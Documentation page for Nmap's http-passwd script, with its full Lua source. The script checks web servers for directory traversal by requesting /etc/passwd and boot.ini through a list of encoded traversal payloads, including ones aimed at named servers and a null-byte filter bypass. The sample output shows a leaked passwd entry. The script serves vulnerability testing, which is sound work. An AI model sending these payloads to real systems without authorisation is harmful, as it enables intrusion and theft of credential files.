<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File http-passwd</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth,auth<br/>
<b>Author:</b> Kris Katterjohn, Ange Gutek<br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://svn.nmap.org/nmap/scripts/http-passwd.nse">https://svn.nmap.org/nmap/scripts/http-passwd.nse</a><br/>
<h3>Summary</h3>
<p>Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.</p>
<p>The script uses several technique:</p>
<ul>
<li>Generic directory traversal by requesting paths like ../../../../etc/passwd.</li>
<li>Known specific traversals of several web servers.</li>
<li>Query string traversal. This sends traversals as query string parameters to paths that look like they refer to a local file name. The potential query is searched for in at the path controlled by the script argument http-passwd.root.</li>
</ul>
<h3>Arguments</h3>
<table>
<tr><td>http-passwd.root:</td><td>Query string tests will be done relative to this path. The default value is /. Normally the value should contain a leading slash. The queries will be sent with a trailing encoded null byte to evade certain checks; see <a href="http://insecure.org/news/P55-01.txt" target=_blank>http://insecure.org/news/P55-01.txt</a>.</td></tr>
<tr><td>slaxml.debug:</td><td>See the documentation for the <a href="nmap/libraries/slaxml.htm">slaxml</a> library</td></tr>
<tr><td>http.host:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-body-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-cache-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.truncated-ok:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.useragent:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>smbdomain:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbhash:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbnoguest:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbpassword:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbtype:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbusername:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap --script http-passwd --script-args http-passwd.root=/test/ &lt;target&gt;</pre>
<h3>Output</h3>
<pre>80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: &quot;index.html?../../../../../boot.ini&quot;
| Printing first 250 bytes:
| [boot loader]
| timeout=30
| default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
| [operating systems]
|_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=&quot;Microsoft Windows XP Professional&quot; /noexecute=optin /fastdetect


80/tcp open  http
| http-passwd: Directory traversal found.
| Payload: &quot;../../../../../../../../../../etc/passwd&quot;
| Printing first 250 bytes:
| root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
| sshd:*:65532:65534::/:/bin/false
| ftp:*:65533:65534::/:/bin/false
|_nobody:*:65534:65534::/:/bin/false</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/http.htm">http</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/string.htm">string</a></li>
</ul>
<h3>Code</h3>
<pre>local http = require &quot;http&quot;
local shortport = require &quot;shortport&quot;
local stdnse = require &quot;stdnse&quot;
local string = require &quot;string&quot;

description = [[
Checks if a web server is vulnerable to directory traversal by attempting to
retrieve &lt;code&gt;/etc/passwd&lt;/code&gt; or &lt;code&gt;\boot.ini&lt;/code&gt;.

The script uses several technique:
* Generic directory traversal by requesting paths like &lt;code&gt;../../../../etc/passwd&lt;/code&gt;.
* Known specific traversals of several web servers.
* Query string traversal. This sends traversals as query string parameters to paths that look like they refer to a local file name. The potential query is searched for in at the path controlled by the script argument &lt;code&gt;http-passwd.root&lt;/code&gt;.
]]

---
-- @usage
-- nmap --script http-passwd --script-args http-passwd.root=/test/ &lt;target&gt;
--
-- @args http-passwd.root Query string tests will be done relative to this path.
-- The default value is &lt;code&gt;/&lt;/code&gt;. Normally the value should contain a
-- leading slash. The queries will be sent with a trailing encoded null byte to
-- evade certain checks; see http://insecure.org/news/P55-01.txt.
--
-- @output
-- 80/tcp open  http
-- | http-passwd: Directory traversal found.
-- | Payload: &quot;index.html?../../../../../boot.ini&quot;
-- | Printing first 250 bytes:
-- | [boot loader]
-- | timeout=30
-- | default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
-- | [operating systems]
-- |_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=&quot;Microsoft Windows XP Professional&quot; /noexecute=optin /fastdetect
--
--
-- 80/tcp open  http
-- | http-passwd: Directory traversal found.
-- | Payload: &quot;../../../../../../../../../../etc/passwd&quot;
-- | Printing first 250 bytes:
-- | root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
-- | sshd:*:65532:65534::/:/bin/false
-- | ftp:*:65533:65534::/:/bin/false
-- |_nobody:*:65534:65534::/:/bin/false

-- 07/20/2007:
--   * Used Thomas Buchanan&#39;s HTTPAuth script as a starting point
--   * Applied some great suggestions from Brandon Enright, thanks a lot man!
--
-- 01/31/2008:
--   * Rewritten to use Sven Klemm&#39;s excellent HTTP library and to do some much
--     needed cleaning up
--
-- 06/2010:
--   * Added Microsoft Windows (XP and previous) support by also looking for
--     \boot.ini
--   * Added specific payloads according to vulnerabilities published against
--     various specific products.
--
-- 08/2010:
--   * Added Poison NULL Byte tests

author = {&quot;Kris Katterjohn&quot;, &quot;Ange Gutek&quot;}

license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;

categories = {&quot;intrusive&quot;, &quot;vuln&quot;}


--- Validates the HTTP response code and checks for a &lt;code&gt;valid&lt;/code&gt; passwd
-- or Windows Boot Loader format in the body.
--@param response The HTTP response from the server.
--@return The body of the HTTP response.
local validate = function(response)
  if not response.status then
    return nil
  end

  if response.status ~= 200 then
    return nil
  end

  if response.body:match(&quot;^[^:]+:[^:]*:[0-9]+:[0-9]+:&quot;) or response.body:match(&quot;%[boot loader%]&quot;) then
    return response.body
  end

  return nil
end

--- Transforms a string with &quot;.&quot;, &quot;/&quot; and &quot;\&quot; converted to their URL-formatted
--- hex equivalents
--@param str String to hexify.
--@return Transformed string.
local hexify = function(str)
  local ret
  ret = str:gsub(&quot;%.&quot;, &quot;%%2E&quot;)
  ret = ret:gsub(&quot;/&quot;, &quot;%%2F&quot;)
  ret = ret:gsub(&quot;\\&quot;, &quot;%%5C&quot;)
  return ret
end

--- Truncates the &lt;code&gt;passwd&lt;/code&gt; or &lt;code&gt;boot.ini&lt;/code&gt; file.
--@param passwd &lt;code&gt;passwd&lt;/code&gt; or &lt;code&gt;boot.ini&lt;/code&gt;file.
--@return Truncated passwd file and truncated length.
local truncatePasswd = function(passwd)
  local len = 250
  return passwd:sub(1, len), len
end

--- Formats output.
--@param passwd &lt;code&gt;passwd&lt;/code&gt; or &lt;code&gt;boot.ini&lt;/code&gt; file.
--@param dir Formatted request which elicited the good response.
--@return String description for output
local output = function(passwd, dir)
  local trunc, len = truncatePasswd(passwd)
  return (&#39;Directory traversal found.\nPayload: &quot;%s&quot;\nPrinting first %d bytes:\n%s&#39;):format(dir, len, trunc)
end

portrule = shortport.http

action = function(host, port)
  local dirs = {
    hexify(&quot;//etc/passwd&quot;),
    hexify(string.rep(&quot;../&quot;, 10) .. &quot;etc/passwd&quot;),
    hexify(string.rep(&quot;../&quot;, 10) .. &quot;boot.ini&quot;),
    hexify(string.rep(&quot;..\\&quot;, 10) .. &quot;boot.ini&quot;),
    hexify(&quot;.&quot; .. string.rep(&quot;../&quot;, 10) .. &quot;etc/passwd&quot;),
    hexify(string.rep(&quot;..\\/&quot;, 10) .. &quot;etc\\/passwd&quot;),
    hexify(string.rep(&quot;..\\&quot;, 10) .. &quot;etc\\passwd&quot;),

    -- These don&#39;t get hexified because they are targeted at
    -- specific known vulnerabilities.
    &#39;..\\\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\boot.ini&#39;,
    --miniwebsvr
    &#39;%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./boot.ini&#39;,
    &#39;%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini&#39;,
    --Acritum Femitter Server
    &#39;\\\\..%2f..%2f..%2f..%2fboot.ini% ../&#39;,
    --zervit Web Server and several others
    &#39;index.html?../../../../../boot.ini&#39;,
    &#39;index.html?..\\..\\..\\..\\..\\boot.ini&#39;,
    --Mongoose Web Server
    &#39;///..%2f..%2f..%2f..%2fboot.ini&#39;,
    &#39;/..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini&#39;,
    &#39;/%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\boot.ini&#39;,
    -- Yaws 1.89
    &#39;/..\\/..\\/..\\/boot.ini&#39;,
    &#39;/..\\/\\..\\/\\..\\/\\boot.ini&#39;,
    &#39;/\\../\\../\\../boot.ini&#39;,
    &#39;////..\\..\\..\\boot.ini&#39;,
    --MultiThreaded HTTP Server v1.1
    &#39;/..\\..\\..\\..\\\\..\\..\\\\..\\..\\\\\\boot.ini&#39;,
    --uHttp Server
    &#39;/../../../../../../../etc/passwd&#39;,
    --Java Mini Web Server
    &#39;/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini&#39;,
    &#39;/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%2fpasswd&#39;,
  }

  for _, dir in ipairs(dirs) do
    local response = http.get(host, port, dir)

    if validate(response) then
      return output(response.body, dir)
    end
  end

  local root = stdnse.get_script_args(&quot;http-passwd.root&quot;) or &quot;/&quot;

  -- Check for something that looks like a query referring to a file name, like
  -- &quot;index.php?page=next.php&quot;. Replace the query value with each of the test
  -- vectors.
  local response = http.get(host, port, root)
  if response.body then
    local page_var = response.body:match (&quot;[%?%&amp;](%a-)=%a-%.%a&quot;)
    if page_var then
      local query_base = root .. &quot;?&quot; .. page_var .. &quot;=&quot;
      stdnse.debug1(&quot;testing with query %s.&quot;, query_base .. &quot;...&quot;)

      for _, dir in ipairs(dirs) do
        -- Add an encoded null byte at the end to bypass some checks; see
        -- http://insecure.org/news/P55-01.txt.
        local response = http.get(host, port, query_base .. dir .. &quot;%00&quot;)

        if validate(response) then
          return output(response.body, dir .. &quot;%00&quot;)
        end

        -- Try again. This time without null byte injection. For example as
        -- of PHP 5.3.4, include() does not accept paths with NULL in them.
        local response = http.get(host, port, query_base .. dir)
        if validate(response) then
            return output(response.body, dir)
        end
      end
    end
  end
end</pre>
